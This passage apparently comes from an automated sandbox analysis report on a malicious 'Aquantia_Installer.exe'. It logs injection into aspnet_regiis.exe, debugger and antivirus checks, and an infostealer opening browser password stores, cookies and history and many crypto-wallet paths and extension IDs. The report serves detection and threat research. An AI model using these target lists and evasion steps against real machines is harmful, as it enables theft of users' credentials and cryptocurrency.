              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2F93A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF2F93A
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF322CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CF322CB
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F50000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F51000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F93000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F96000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA7000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA8000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F51000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F93000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2F96000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA7000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2FA8000Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2C05008Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2FB08 cpuid 0_2_6CF2FB08
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeQueries volume information: C:\Users\user\Desktop\Aquantia_Installer.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2F583 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CF2F583
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: aspnet_regiis.exe, 00000003.00000003.2161638723.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157759607.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157835708.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157863312.0000000003131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2380, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: |llets/Electrum-LTC:
              Source: aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCash
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
